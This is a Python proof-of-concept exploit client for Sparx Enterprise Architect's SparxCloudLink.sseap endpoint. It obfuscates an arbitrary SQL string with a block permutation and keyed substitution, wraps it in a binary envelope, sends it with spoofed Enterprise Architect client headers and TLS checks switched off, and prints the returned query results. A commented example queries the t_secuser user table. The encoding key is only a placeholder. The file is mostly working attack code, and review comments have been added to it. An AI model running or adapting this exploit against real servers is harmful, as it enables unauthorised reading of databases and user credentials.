# Proof-of-concept client that sends a caller-supplied SQL string to the
# "/SparxCloudLink.sseap" endpoint of the host given on the command line.
# The string is length-prefixed, padded, permuted, run through a keyed
# substitution and wrapped in a small binary envelope before being POSTed.
#
# What a proxy or web-server log would see from this script: an HTTP POST to
# <host>/SparxCloudLink.sseap carrying the fixed EnterpriseArchitect-Build,
# EnterpriseArchitect-InternalBuild and User-Agent header values set below.
#
# NOTE(review): the file does not say which server versions accept this
# request or what authorization the endpoint is supposed to enforce.
import sys
import requests  # not referenced anywhere in this file
import urllib3  # not referenced anywhere in this file
import pycurl
from io import BytesIO
import zipfile

# Key for custom_encode/custom_decode. This is a placeholder; the real key is
# not part of this file. An empty key would make the "% key_len" below raise
# ZeroDivisionError.
k="HERE_SHOULD_BE_THE_KEY"
# Permutation of the indices 0..6, applied independently to each 7-char block.
x=[4, 2, 0, 6, 3, 1, 5]
# Inverse of x: xr[i] is the position at which x holds the value i.
xr=[x.index(i) for i in range(7)]

def mangle(s:str) -> str:
    """Permute each complete 7-character block of *s* using ``xr``.

    Characters beyond the last complete block are left where they are.
    The buffer is indexed by UTF-8 byte while *s* is indexed by character,
    so the two only line up for ASCII input (assumed, not checked).
    """
    o=bytearray(s,"utf-8")
    for i in range((len(s) // 7)*7):
        # (i // 7)*7 is the start of the current block; xr picks the source
        # position inside that block.
        o[i]=ord(s[((i // 7)*7)+xr[i % 7]])
    return o.decode("utf-8")

def demangle(s:str) -> str:
    """Permute each complete 7-character block of *s* using ``x``.

    ``x`` and ``xr`` are inverse permutations, so this undoes ``mangle``
    for the blocks that ``mangle`` touched. The same ASCII-only assumption
    applies.
    """
    o=bytearray(s,"utf-8")
    for i in range((len(s) // 7)*7):
        o[i]=ord(s[((i // 7)*7)+x[i % 7]])
    return o.decode("utf-8")

def custom_decode(ciphertext: str, key: str) -> str:
    """Reverse ``custom_encode`` for the given *key*.

    Args:
        ciphertext: encoded string, as produced by ``custom_encode``.
        key: key string; must be non-empty (it is indexed modulo its length).

    Returns:
        The decoded string. Range correction is one conditional add and one
        conditional subtract of 0x5E rather than a modulo, so the result is
        only brought back into 0x20..0x7E when the raw value is off by at
        most one period (presumably true for printable-ASCII input and key;
        confirm before relying on it).
    """
    output_chars = []
    length = len(ciphertext)
    key_len = len(key)
    for i, ch in enumerate(ciphertext):
        # load ciphertext character as integer
        c_val = ord(ch)
        # key character for this position; the index is offset by the total
        # message length, matching custom_encode
        k_val = ord(key[(i+length) % key_len])
        # undo "+0x20", "+key" and "-0x40" from the encoder
        c_val = c_val - 0x20 - k_val + 0x40
        if c_val<0x20:
            c_val=c_val+0x5E
        if c_val>(0x5E+0x20):
            c_val=c_val-0x5E
        output_chars.append(chr(c_val))
    return "".join(output_chars)

def custom_encode(plaintext: str, key: str) -> str:
    """Encode *plaintext* with a position-dependent additive substitution.

    Each output character is ``((ord(ch) - 0x40 + ord(key_char)) % 0x5E) + 0x20``.

    Args:
        plaintext: input string.
        key: key string; must be non-empty (it is indexed modulo its length).

    Returns:
        Encoded string whose characters lie in 0x20..0x7D, since the
        remainder modulo 0x5E is at most 0x5D. Input characters 0x20 and
        0x7E differ by exactly 0x5E and therefore encode to the same value.
    """
    output_chars = []
    length = len(plaintext)
    key_len = len(key)
    for i, ch in enumerate(plaintext):
        # load plaintext character as integer
        c_val = ord(ch)
        # subtract 0x40
        c_val = c_val - 0x40
        # key character for this position; the index is offset by the total
        # message length, so the key alignment depends on how long the input is
        k_val = ord(key[(i+length) % key_len])
        # add key
        total = k_val + c_val
        # modulo 94
        total = total % 0x5E
        # add 0x20 (ensures printable ASCII)
        encoded_val = total + 0x20
        # append encoded character
        output_chars.append(chr(encoded_val))
    return "".join(output_chars)

def test(debug_type, debug_msg):
    """pycurl DEBUGFUNCTION callback: print each debug record to stdout."""
    print("debug(%d): %s" % (debug_type, debug_msg))

if __name__ == "__main__":
    if (len(sys.argv)!=4):
        print("Usage: "+sys.argv[0]+" URL_without_sparxcloudlink_path model_name sql")
        exit(-1)
    host = sys.argv[1]
    repo = sys.argv[2]
    sqli = sys.argv[3]
    #url = "%s/SparxCloudLink.sseap?model=%s"%(host,repo)
    url = "%s/SparxCloudLink.sseap"%(host)
    print(url)
    # Prefix the statement with its decimal length and a colon.
    sqli = str(len(sqli))+":"+sqli
    # Pad to a multiple of 7 with the tail of this fixed string so that
    # mangle() permutes the whole payload. When the length is already a
    # multiple of 7 all seven filler characters are appended.
    fill="+d1XL|@"
    sqli += fill[-(7-(len(sqli)%7)):]
    print (sqli)
    #sqli="23:Select * from t_secuser|@"
    ret=custom_encode(mangle(sqli),k)
    # Binary envelope, in order:
    #   6 fixed bytes 00 00 00 01 00 00
    #   2-byte big-endian value len(ret)*2+66 (meaning of 66 is not
    #     established by this file)
    #   2-byte big-endian length of the model name, in characters
    #   model name, each character followed by a 0x00 byte
    #   4 fixed bytes 00 01 00 00
    #   2-byte big-endian length of the encoded payload, in characters
    #   encoded payload, each character followed by a 0x00 byte
    # '%04X' yields more than four hex digits for values above 0xFFFF, and an
    # odd digit count makes bytes.fromhex raise ValueError.
    binary=bytes([0,0,0,1,0,0])
    binary+=bytes.fromhex('%04X'%(len(ret)*2+66))
    binary+=bytes.fromhex('%04X'%(len(repo)))
    for c in repo:
        # bytes([...]) raises ValueError for code points above 255
        binary+=bytes([ord(c),0])
    binary+=bytes([0,1,0,0])
    binary+=bytes.fromhex('%04X'%(len(ret)))
    for c in ret:
        binary+=bytes([ord(c),0])
    # "c" is reused here: it was the loop variable above and is now the
    # curl handle.
    c=pycurl.Curl()
    c.setopt(pycurl.URL, url)
    c.setopt(pycurl.READDATA, BytesIO(binary))
    c.setopt(pycurl.POSTFIELDSIZE, len(binary))
    c.setopt(pycurl.POST, 1)
    c.setopt(pycurl.VERBOSE, 1)
    c.setopt(pycurl.DEBUGFUNCTION, test)
    # Fixed header set sent with every request. 'Content-Type: ' and
    # 'Accept: ' are given with no value (presumably to suppress libcurl's
    # defaults; confirm).
    c.setopt(pycurl.HTTPHEADER, ['Content-Type: ' , 'Accept: ',
                                 'EnterpriseArchitect-Build: 1527' ,
                                 'EnterpriseArchitect-InternalBuild: 481' ,
                                 'User-Agent: Enterprise Architect/15.1.1527' ,
                                 'Connection: Keep-Alive' ,
                                 'Cache-Control: no-cache'])
    body = BytesIO()
    c.setopt(pycurl.WRITEDATA, body)
    # Certificate and host-name verification are both turned off, so the
    # identity of the responding server is not checked and the printed
    # response cannot be attributed to the intended host.
    c.setopt(pycurl.SSL_VERIFYPEER, 0)
    c.setopt(pycurl.SSL_VERIFYHOST, 0)
    c.perform()
    c.close()
    # If the response is a zip archive, print its 'query.xml' member;
    # otherwise write the raw response bytes to stdout.
    try:
        z = zipfile.ZipFile(body)
        print(z.read('query.xml').decode('utf-8'))
    except zipfile.BadZipFile:
        sys.stdout.buffer.write(body.getvalue())